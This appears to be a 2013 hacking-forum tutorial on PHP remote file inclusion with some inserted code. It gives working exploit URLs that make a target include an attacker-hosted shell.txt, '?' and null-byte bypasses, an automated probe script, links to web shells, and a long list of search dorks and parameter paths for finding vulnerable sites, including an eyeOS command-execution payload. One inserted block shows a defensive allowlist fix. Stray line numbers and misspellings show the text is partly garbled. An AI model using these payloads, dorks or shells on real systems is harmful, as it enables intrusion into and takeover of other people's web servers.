87aCk_X

ReMote file inclusion

Aug 29th, 2013
RFI - Remote File Inclusion (easy and short)

For educational purposes only!
Hello, leetcoder users.
First of all, what do you need:

A site vulnerable to RFI.
(Finding one is explained in detail in this tutorial.)

A shell. (Provided in the tutorial.)

This is a very easy tutorial.
It is easy because RFI is easy.
But do not get me wrong:
finding vulnerable sites is the hard part!
Since this is a mistake not a lot of people make, not many sites are vulnerable to it.

But why go to all the trouble of using SQLi, XSS, LFI, CSRF, SSI, ...
if this one is so easy?
That is why I am making this tutorial.
Part 1. Explanation.
-- What is RFI
-- How to find vulnerable sites.
-- How to test for the vulnerability.
Part 2. Exploiting.
-- Looking for the exploit link.
-- Add your shell.
Part 3. Downloads.
-- Shells.
-- Dorks.
  31.  
  32.  
  33. Part 1. Explenation.
  34. Explenation. What is RFI?
  35.  
  36. RFI or remote file inclusion. is a very easy exploiting methode.
  37. But it is a very uncommon vulnerability.
  38. This gets created by not updating patched or wrongly updating them.
  39. So it still happons.
  40. Remote file inclusion is exactly what it means.
  41. You add (include a file into the directory. remotely.)
  42.  
Explanation. How to find vulnerable sites.

Finding vulnerable sites is not so different from finding other vulnerabilities.
We use dorks.
But how exactly does this vulnerability come about?

Well, this is a very simple include file.
Code:
<?php
include($_GET['p']);
?>

It says include $_GET['p'],
which means the link would look something like this:
http://www.[site].com/index.php?p=travel.php
(The parameter name is case sensitive: it has to be p, not P.)

This is important for our exploit code later in the tutorial.

The parameter name could be anything else: letters, words and so on.
Example:
Code:
<?php
include($_GET['RealSteel']);
?>

We already know what this means!
http://www.[site].com/index.php?RealSteel=travel.php
It is something like an id parameter; no time to explain.

To find them, we look for dorks,
or we use scanners and so on,
the same as we do with SQLi ;).
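That include is the whole vulnerability. As an added example (not code from the original tutorial), here is the same pattern next to a hardened version that maps the parameter onto an allowlist instead of using it as a path. The page names, the pages/ directory, the ini values and the function names are made up for the illustration; it assumes PHP 7.4 or newer.

```php
<?php
// Added example, not from the original tutorial.

// Vulnerable: whatever arrives in ?p= goes straight into include().
// With allow_url_include=On (or allow_url_fopen=On on PHP < 5.2) the
// "path" may be http://attacker/shell.txt and PHP fetches and runs it.
function vulnerable_include(): void
{
    include($_GET['p']);            // RFI (and LFI / path traversal)
}

// Appending a suffix does not help: with p=http://attacker/shell.txt?
// the ".php" ends up as the query string of the request to attacker.
function still_vulnerable_include(): void
{
    include($_GET['p'] . '.php');
}

// Hardened: the request picks a key, the key maps to a fixed file.
// Nothing the user sends ever becomes part of a path or URL.
// (Key/file pairs are hypothetical.)
const PAGES = [
    'home'   => 'pages/home.php',
    'travel' => 'pages/travel.php',
];

function resolve_page(string $key): ?string
{
    // Exact allowlist hits only; anything else is rejected.
    return PAGES[$key] ?? null;
}

function safe_include(): void
{
    $file = resolve_page($_GET['p'] ?? 'home');
    if ($file === null) {
        http_response_code(404);
        exit('unknown page');
    }
    include __DIR__ . '/' . $file;
}

// Defence in depth (php.ini): even if a buggy include() slips through,
// PHP will not open URLs for include/require while this is off.
//   allow_url_include = Off   (the default since PHP 5.2)
//   allow_url_fopen   = Off   (if the app never needs remote streams)
```

Only the allowlist changes what the code does; the ini settings stop PHP from opening URLs in include() at all, so a later bug of the same kind can at worst become a local file inclusion, not a remote one.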
  75.  
Explanation. How to test for the vulnerability.
Easy: we will use our full exploit code.
Checking for the vulnerability is literally exploiting it,
so we can actually skip this step! ^^

If you want to check without dropping a shell on the box, host a harmless text file that only prints a marker (for example <?php echo 'rfi-test-ok'; ?>) and look for that marker in the response instead.

Easy, isn't it :D.
Part 2. Exploiting.
Exploiting. Looking for the exploit link!

Simple. Take a link like this, for example:
Code:
http://www.[site].com/index.php?x=RealSteel
Change the =RealSteel part to a file we know exists on the site, i.e. the page that index.php includes:

Code:
http://www.[site].com/index.php?x=realpage.php
If all is good you get no error,
because this file is there! We googled it ^^.
Exploiting. Add your shell.

Exploiting is changing the include to your shell.txt. Host it as .txt, not as .php: if it were a .php file, your own web server would execute it and the target would only include the HTML output instead of the PHP source.
Simply upload a shell and add the link,

as follows:
Code:
http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt?
Add the question mark at the end!! Anything the vulnerable script appends to the parameter (for example ".php") then lands in the query string of the request to your server instead of in the path, so the file is still found.

If you get an error, try changing the exploit link as follows:
Code:
http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt?%00
Watch the %00 at the end; it comes after the question mark. The null byte truncates the path so the appended suffix is dropped, but it only works on PHP older than 5.3.4 (and with magic_quotes_gpc off); newer versions refuse to include a path that contains a null byte.

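The test from this part, written out as an added example (not the tutorial's own tool): a small PHP CLI probe that tries the plain, "?" and "?%00" variants against one parameter and reports which, if any, executed a harmless marker file you host yourself. The probe file contents, the marker value, the hostnames and all function names are assumptions for the illustration; it needs PHP 8 for str_contains().

```php
<?php
// Added example, not from the original tutorial: non-destructive RFI probe.
//
// Instead of a shell, host a harmless file on a server you control, e.g.
// http://www.[MYSITE].com/rfi-probe.txt (hypothetical) containing
//     <?php echo 'RFI-PROBE-' . (7 * 191); ?>
// A vulnerable target executes it and prints RFI-PROBE-1337; a target
// that only reflects or ignores the URL does not.
const MARKER = 'RFI-PROBE-1337';

// Build the three URL variants from the tutorial: plain, with a trailing
// "?" (an appended suffix becomes the remote query string) and with
// "?%00" (null-byte truncation, PHP < 5.3.4 only).
function probe_urls(string $target, string $param, string $remote): array
{
    $sep = str_contains($target, '?') ? '&' : '?';
    $variants = [
        'plain'    => $remote,
        'question' => $remote . '?',
        'nullbyte' => $remote . '?%00',
    ];
    $urls = [];
    foreach ($variants as $name => $value) {
        // rawurlencode() the payload, except that the literal %00 must reach
        // the target as a percent-encoded null byte, not as %2500.
        $encoded = str_replace('%2500', '%00', rawurlencode($value));
        $urls[$name] = $target . $sep . $param . '=' . $encoded;
    }
    return $urls;
}

// True when the response carries the marker, i.e. the remote file was
// executed by the target rather than merely echoed back.
function response_shows_execution(string $body): bool
{
    return str_contains($body, MARKER);
}

// Run every variant through a fetch callback so the logic can be exercised
// offline; the default fetch uses file_get_contents() with a short timeout
// and keeps the body of 4xx/5xx responses (the marker may still be there).
function probe(string $target, string $param, string $remote, ?callable $fetch = null): array
{
    $fetch ??= function (string $url): string {
        $ctx = stream_context_create(['http' => ['timeout' => 10, 'ignore_errors' => true]]);
        return (string) @file_get_contents($url, false, $ctx);
    };
    $results = [];
    foreach (probe_urls($target, $param, $remote) as $name => $url) {
        $results[$name] = response_shows_execution($fetch($url));
    }
    return $results;
}

if (PHP_SAPI === 'cli' && isset($argv) && count($argv) === 4) {
    // usage: php rfi_probe.php 'http://www.[site].com/index.php' x 'http://www.[MYSITE].com/rfi-probe.txt'
    foreach (probe($argv[1], $argv[2], $argv[3]) as $name => $hit) {
        printf("%-9s %s\n", $name, $hit ? 'EXECUTED' : 'no');
    }
}
```

If "plain" fails but "question" succeeds, the script appends something to the parameter; if only "nullbyte" succeeds, you are looking at an old PHP. A hit on any variant means the same URL with shell.txt in place of the probe file will run your shell.
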
Part 3. Downloads.
Shells
-----------------
PHPJackal Shell < --- http://pastebin.com/rLq3iQEV
g00nshell v1.3 Final < --- http://pastebin.com/XdhUJ3t5
Root Shell < --- http://pastebin.com/yuLGFxpF
-----------------
Some dorks:
---------
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?doc=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?document=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/main.php?view=
/index.php?page=
/content.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index2.php?menu=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurl:PNphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword: "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword: "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword: "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword: "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews or allinurl:/ashnews.php
/ashnews.php?pathtoashnews=

15. keyword: /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

17. keyword: "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
replaced with:
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

18. allinurl:.php?bodyfile=

19. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

20. allinurl:forums.html
/modules.php?name=

21. allinurl:/default.php?page=home

22. allinurl:/folder.php?id=

23. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

24. Keyword: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests" )
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. allinurl:application.php?base_path=
/application.php?base_path=

26. allinurl:phplivehelper
/phplivehelper/initiate.php?abs_path=

27. allinurl:phpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

28. keyword: "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

29. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

30. allinurl:/forum/
/forum/admin/index.php?inc_conf=

31. keyword: "Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

32. allinurl:shoutbox/expanded.php filetype:php
/shoutbox/expanded.php?conf=

33. allinurl:/osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

34. keyword: "Powered by iUser"
/common.php?include_path=

35. allinurl:"static.php?load="
/static.php?load=

36. keyword: /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

37. keyword: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

38. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="
inurl:"/os/pointer.php?url="
inurl:"folder.php?id="
inurl:"show.php?page="
inurl:"index2.php?DoAction="
inurl:"index.php?canal="
inurl:"index.php?screen="
inurl:"index.php?langc="
inurl:"index.php?Language="
inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"
rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="
inurl:"video.php?content="
inurl:"pages.php?page="
inurl:"index1.php?choix="
inurl:"index1.php?menu="
inurl:"index2.php?ascii_seite="

dork: inurl:surveys
rfi of this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel
rfi of this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"
rfi of this dork: /sources/functions.php?CONFIG[main_path]=
rfi of this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"
rfi of this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="
rfi of this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"
rfi of this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"
rfi of this dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=
inurl:"index.php?go="
inurl:"index1.php?="
inurl:"lib/gore.php?libpath="
inurl:"index2.php?p="